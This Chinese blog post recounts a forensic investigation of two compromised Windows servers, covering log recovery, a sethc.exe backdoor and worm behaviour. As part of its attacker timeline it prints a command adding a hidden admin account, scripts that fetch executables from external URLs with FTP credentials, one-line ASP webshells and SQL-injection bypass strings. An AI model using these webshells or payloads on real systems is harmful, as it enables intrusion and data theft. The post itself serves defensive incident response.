安全专家:真实的网络***取证纪实

2024-05-10 04:08:40
诚信网安--子明

【51CTO.com 专家特稿】随着信息技术的发展,越来越多的人都喜欢用计算机办公,发邮件,建设自己的个 人站点,公司建立自己的企业站点,政府也逐渐的采取了网上办公,更好的为人民服务,银行和证券机构也都开始依托互联网来进行金融和股票交易,但是随着方便 的同时也同时带来了新的一些计算机网络安全隐患,随着司法机关的介入,我相信在不久的将来,网络***调查取证也会成为立法机构必须要考虑设立的一门新的学 科,目前来说开设这个的课程多在网络警察和一些特殊机关,现在我来给大家讲下我亲身经历并参与完成的一次取证过程,用事实来讲述;
我一直从事病毒分析,网络***响应相关的工作,这次应好朋友的邀请,帮忙配合去协查几台服务器,我们来到了某XXX驻地,首先进行例行检查。经过了 1天左右的时间的检查,其中用到了一些专用设备也包含自主编写的工具以及第三方提供的勘察取证软件,共发现问题主机服务器10台,其中2台比较严重,(以 下用A服务器和B服务器来代替)和朋友商定后,决定带回我们的实验室,进行专项深入分析。
习惯的检查步骤操作:
服务器操作系统版本信息——>操作系统补丁安装情况——>操作系统安装时间,中间有没有经过进行重新安装——>服务器维护情况——>服务器上面安装的软件版本信息
日志检查——IDS日志信息/IIS日志信息/系统日志信息
网站代码审查——是否存在一句话***,源代码上是否存在恶意代码插入
杀毒软件版本更新情况——是否是最新版本,配置的是否合理,配套的监视是否全部打开
数据恢复——>利用专用数据恢复软件进行数据恢复,恢复一些被删除的日志信息和系统信息,曾经安装过的文件操作信息。
提取可疑文件(病毒、***、后门、恶意广告插件)——在系统文件目录利用第三方或者自开发软件,对可疑文件进行提取并进行深度分析。
上述步骤是我个人总结的,有不妥的地方还请朋友们指正,介绍完理论,我们来实践处理下这两台服务器。
A服务器检查处理过程
该A服务器所装的操作系统是Advanced 2000 server,服务器上安装的有瑞星2008杀毒软件,病毒库已经更新到最新版本。但是并没有安装网络防火墙和其他系统监视软件,安装的ftp服务器版本为server-u 6.0(存在溢出***的威胁)
一 对原始数据进行恢复
利用Datarecover软件来恢复一些被删除的文件,目的是希望从被删除的 文件来找出一些***或者后门以及病毒。进行深度分析,把曾经做过的格式化,以及在回收站中删除过的文件恢复过来,但是遗憾的是成功拿下这台服务器权限的黑 客已经做了专业处理,把他的一些痕迹进行了全面清理,个人认为他使用了日本地下***组织开发的专项日志清除工具,经过我和助手的共同努力还是把系统日志恢 复到当年5月份。
二 手工分析可疑文件
在本服务器的c盘根目录下面有一个sethc..exe 文件。这个文件是微软自带的,是系统粘制键,真实的大小应为27kb,而这个文件为270kb,起初我以为是由于打补丁的原因。但是经过翻阅一些资料和做 比对之后,才知道这样的文件是一个新开发的流行后门,主要用法:通过3389终端,然后通过5次敲击shift键,直接调用sethc.exe而直接取得 系统权限。随后达到控制整个服务器,通常他还是通过删除正常的一些c盘exe文件。然后把自己伪造成那个所删除的exe文件名。造成一种假象。
这里我们提供解决方法如下:个人建议这个功能实用性并不高,建议直接删除这个文件,如果有人利用这个手法来对你的服务器进行***,那就肯定是有人做了手脚,可以第一时间发现******行为,也可以作为取证分析的一个思路;在控制面板的辅助功能里面设置取消粘制键。
三、 利用专用防火墙检查工具去查看网络连接情况
目的是通过抓数据包来找出问题。如果对方安装的有远程控制终端,他肯定需要让保存在服务器上的后门和控制终端进行通话,会有一个会话连接。通过防火墙的拦截功能而去寻找出控制的源头。这个上面没有发现存在反弹***,所以没有看到***的源头。
四、检查系统日志
作用:检查系统日志是否被***者清除,如果日志被***者删除,需要用数据恢复软件恢复操作系统日志
检查内容:主要包括IIS日志,安全性日志,系统日志。
更近一步深入检查:
找到日志后,仔细分析网站是否有***者留下的webshell,尤其是一句话后门
根据Webshell的名字, 在IIS 访问日志里搜索相关的名字,找到***者常用的ip地址,分析ip地址
还可以根据此IP地址检索IIS日志中,此***者都进行过什么样的操作
技术点滴:如果你比较熟悉Webshell,通过Get操作可以知道***者都进行过何种操作。因为Get操作是被系统记录的。
如果***者装有系统级的后门,用常用工具比如冰刃(IceSword),System Repair Engineer (SREng)等分析出可疑文件,用其他调试工具分析找到***者控制端IP地址。
通过服务器日志查出隐藏在后面的幕后***
通过iis的log访问日志,排查出三个可疑目标,其中一个手法相对于后两个***者更熟练一些,他 在今年5月份左右或者更早就拿到了该服务器权限,上来之后到是没有做任何的添加和修改,从技术上来看,他是通过寻找网站的注入点进来的,然后在上面放了不 少的后门,还放了一个mm.exe的文件,但是因为技术问题,没有把这个马运行起来,从外部访问只是在主页上显示为mm.jpeg,伪装成了图片。但是打 开以后,什么都没有。经过我们分析以后,它是一张裸女的jpeg文件。如果他这个mm.exe成功,完全有可能将该主站页面换成一张×××。危害还是有 的。另外该站点权限给的过高,在访问新闻频道的时候,直接就是sa权限。这个是最高系统级和Admin是一个级别的。
由于服务器被网管人员重新装过,初步怀疑是用的ghost安装的,造成了原珍贵日志数据无法找回,我们只能分析出7月份-12月份这段时间的日志,通过这些日志我们又发现了针对此站点的***记录。
***者操作再现:(******操作过程分析)
2007-07-15 14:51:53 61.184.107.206 添加管理用户 net localgroup administrator Cao$ /add
2007-07-15 15:08:56 61.184.107.206 写下载exe的vbs脚本 c:\admin.vbs 试图下载exe地址为: [url]http://www.dianqiji.com/pic/2007/0428/admin.exe[/url] 
2007-08-12 09:48:45 218.205.238.6 写入webshell小马:d:\ybcenter\gg3.asp shell里留的QQ:183037,之后此人频繁用此后门登陆服务器
2007-08-25 08:03:15 218.28.24.118 曾访问他以前留下的操作数据库的webshell /system/unit/main.asp 此后门可以浏览到敏感数据库的信息
2007-08-25 08:12:45 218.28.24.118 写入另一个webshell D:\ybcenter\ggsm.asp
之后,218.28.24.118用以前留下的功能比较全的webshell /Cnnsc.asp和/system/unit/Cnnsc.asp频繁操作服务器上文件
2007-11-11 14:23:23 218.28.24.118 用他曾经留下的操作数据库的后门/service/asp.asp访问敏感数据库的信息
2007-08-25 08:27:57 218.28.24.118  用他曾经留下的操作数据库的后门/system/unit/sql.asp访问敏感数据库的信息
2007-11-11 11:02:55 218.28.24.118 试图访问他曾经留下的操作数据库的后门/yb/in_main3.asp访问敏感数据库
2007-08-06 12:42:41 218.19.22.152 写下载脚本C:\down.vbs 下载的exe为 [url]http://ray8701.3322.org/1.exe[/url]
2007-08-09 11:57:16 218.19.98.147 写ftp下载exe的脚本c:\zxq.txt ftp服务器203.253.31.244 用户名kick1000 密码84460965 下载1.exe
2007-08-26 07:43:47 123.5.57.117 试图***服务器
2007-08-26 07:43:47 123.5.57.117 写ftp下载exe的脚本c:\zxq.txt ftp服务器203.253.31.244 用户名kick1000 密码84460965 下载1.exe
2007-12-10 12:41:34 123.52.18.141 检测注入
五、查看登陆信息  查看是否存在有克隆帐户。
方法:检查注册表里面的sam文件有没有相同的fv,在这里检查过程中没有发现存在有克隆帐号。
六、查看系统安装日志,在这里并未发现问题。
七、 查看IIS访问日志,在这里发现了***者信息。
2007-12-01 08:55:16 220.175.79.231 检测注入
2007-12-03 18:40:48 218.28.68.126 检测注入
2007-12-04 01:31:32 218.28.192.90 检测注入,扫描web目录
2007-12-04 23:23:33 221.5.55.76  检测注入
2007-12-05 09:20:57 222.182.140.71 检测注入
2007-12-08 09:39:53 218.28.220.154 检测注入
2007-12-08 21:31:44 123.5.197.40 检测注入
2007-12-09 05:32:14 218.28.246.10 检测注入
2007-12-09 08:47:43 218.28.192.90 检测注入
2007-12-09 16:50:39 61.178.89.229 检测注入
2007-12-10 05:50:24 58.54.98.40  检测注入
定位可疑IP地址,追踪来源 查出IP地址的信息。
八、查看网站首页的源代码,在iframe 这个位置查看是否有不属于该网站的网站信息。(查找 网马的方法),以及如何发现一些潜在的***和网络可利用漏洞。
下面是我们得到的一些他的网马。 
gg3.asp  Q:183637log.asppigpot.aspwebdown.vbsattach/a.gifattach/chongtian.gifattach/111.rarsystem/unit/yjh.asp

system/unit/conn.asp 加入防注入Q:6242889678

p_w_picpaths/mm.jpg = exe自解压 主页包含文件
一句话***:<%execute request %>
备份一句话*** <%eval(request("a"):response.end%>
注射检查,在IIS里面查找是否存在的有针对  %20 and 1=1’sql
'or'='or' a'or'1=1--  ,'or1=1-- ,"or1=1-- ,or1=1--, 'or'a'='a, "or"="a'='a等
作用:躲避验证信息  主要用在后台登陆上
%5c 爆数据库,作用直接下载服务器上的数据库,获得用户名和密码,经过系统提权而拿到整个服务器权限。
针对一些下载者这样的*** ,主要需要在windows /document and setting下面的local  setting 的 temp 或者 temp internet的这个文件夹中查看刚生成的exe文件,重点查看一下在system32文件夹下面的exe文件,尤其关注最新生成的exe文件,伪造的 系统文件等。
以上就是针对A服务器的整个检查过程以及发现问题后该如何处理和补救的相关解决方法。
B服务器检查取证分析
B服务器装的是windows2000 server版本,操作步骤同上。
经过一段细心的检查还是让我和助手们发现了一个***,起因是在网站源代码处发现都被插入了一些奇怪的代码,在system32系统文件夹下还发现了新的niu.exe,非常可疑,提取该exe文件,在虚拟机中进行分析,得出该exe工作原理:
该exe属***类,病毒运行后判断当前运行文件的文件路径如果不是%System32%\SVCH0ST.EXE,将打开当前文件的所在目录复制自 身到%System32%下,更名为SVSH0ST.EXE,并衍生autorun.inf文件;复制自身到所有驱动器根目录下,更名为niu.exe, 并衍生autorun.inf文件,实现双击打开驱动器时,自动运行病毒文件;遍历所有驱动器,在htm、asp、aspx、php、html、jsp格 式文件的尾部插入96个字节的病毒代码;遍历磁盘删除以GHO为扩展名的文件,使用户无法进行系统还原;连接网络下载病毒文件;修改系统时间为2000 年;病毒运行后删除自身。
以上是我配合有关部门参与的真实的一次的取证记录,因为答应过朋友要保守秘密,所以真实的一些ip地址和信息这里都做保留。同时在这里我要感谢安天cert组的战友的帮忙,以及身边的2个助手的并肩作战。

转载于:https://blog.51cto.com/trustsec/68105

安全专家:真实的网络***取证纪实相关推荐

  1. 安全专家:真实的网络攻击取证纪实

    随着信息技术的发展,越来越多的人都喜欢用计算机办公,发邮件,建设自己的个人站点,公司建立自己的企业站点,政府也逐渐的采取了网上办公,更好的为人民服务,银行和证券机构也都开始依托互联网来进行金融和股票交 ...

  2. Nessus: 漏洞扫描器-网络取证工具

    Nessue 要理解网络漏洞攻击,应该理解攻击者不是单独攻击,而是组合攻击.因此,本文介绍了关于Nessus历史的研究,它是什么以及它如何与插件一起工作.研究了Nessus的特点,使其成为网络取证中非 ...

  3. 网络取证第四、九章实验

    网络取证 第四章案例 一.Ann的异常即时通信[TCP.UDP] 1.课本案例 利用封装协议中的信息 0X4500 IPV4协议数据包的开始 利用TCP/UDP端口号,与默认的标准服务相对应 分析源或 ...

  4. 弱网测试工具以及模拟真实的网络环境

    弱网测试的情况和意义我就不讲了,基本上浏览器搜一下就清楚了,我这里主要是讲下我在实际测试环境中对弱网的工具选择以及怎么去模拟真实的网络环境. 弱网工具 现在网络上用于限制网络的工具有很多,我这里主要介 ...

  5. 6-wireshark网络安全分析——网络取证一

    1. 通过Wireshark网络取证 Wireshark既然可以解析网络中的各种数据流量,那么通过网络传输协议,例如ftp协议传输的文件数据wireshark也可以对其解析,本质上FTP协议是基于传输 ...

  6. 【网络取证篇】suy网络工具包

    suy网络工具包及补充说明 ​ 经常查询各类信息用网页收藏夹不是太方便,偷了个懒,把常用的一些查询网站借助Rolan工具汇总成工具箱,没什么介绍的,所见即所得,在文档里补充了其它一些网络安全资源,请忽 ...

  7. 半夜钱款莫名被转走!睡觉手机到底该不该关机?安全专家解读新型网络盗窃!...

    (点击上方公号,快速关注我们) 来源:360 - 黄琳 近期各地陆续发生一些利用短信验证码冒用身份的案件,攻击者窃取银行账户.金融类app中的财产,被害者甚至莫名"被网贷",蒙受了 ...

  8. 15.wireshark学习-网络取证练习2

    难题2:安跳过保释 2009年10月10日 / SHERRI / 7条评论 在被保释后,安·德雷克消失了!幸运的是,调查人员在她逃离城镇之前仔细监视了她的网络活动.警察局长说:"我们相信安在 ...

  9. BlackHat2017热点之数据取证与事件响应

    美国黑帽大会(Black Hat USA)创办于1997年,被公认为世界信息安全行业的最高盛会,也是最具技术性的信息安全会议.大会每年吸引全球来自100多个国家的超过1万5千名专业观众参与.250多家 ...

最新文章

  1. IPv4_数据报文首部格式
  2. html如何创建学生信息表,创建学生对象并且能访问网页
  3. 服务器和运行内存,服务器运行内存不够的解决方法
  4. 系统部署文档_惊喜!Alibaba架构师终于发布“微服务架构与实践”文档
  5. CSS设置段落的垂直对齐
  6. Mozilla宣布关闭 Persona
  7. OpenGL ES 2.0 for iPhone Tutorial
  8. java连接phpstudy_PHPStudy快速自动搞定所有配置文件
  9. 江苏省计算机分级考试试题,江苏省计算机等级考试基础知识考题.doc
  10. 红橙Darren视频笔记 条件查询 删除 更新,数据库结合http做缓存机制(数据库操作)下
  11. JAVA基础系列:Arrays.binarySearch二分查找
  12. ssma迁移助手_如何使用SQL Server迁移助手(SSMA)和SSIS将MySQL表迁移到SQL Server
  13. Angular通过XHR加载模板而限制使用file://(解决方案)
  14. Informatica_(2)第一个例子
  15. Hadoop中Yarnrunner里面submit Job以及AM生成 至Job处理过程源码解析
  16. IP地址、子网掩码、有效子网数、有效主机数
  17. c语言24小时计时法转换为12小时,12时24时换算题(24小时和12小时换算方法)
  18. ios真机调试出现“不受信任的开发者”解决方法
  19. linux系统在当前目录下创建子目录,linux根目录下一级子目录
  20. dot格式绘图工具 html,使用dot来绘图

热门文章

  1. promise中的.then方法【待完善】
  2. SpringBoot之conditional注解
  3. pyautogui操作你的鼠标键盘
  4. 二手房买卖银行迟迟不放款,买房人构成违约吗?
  5. 有刷电机驱动专题-直流有刷电机调速电路分析
  6. api测试 免费api
  7. C++ (PTA) 红色警报 并查集
  8. 深入解析Mac OS X iOS操作系统
  9. 玖章算术CEO叶正盛在数据技术嘉年华分享NineData AIGC的应用实践
  10. Mysql集群配置(回顾)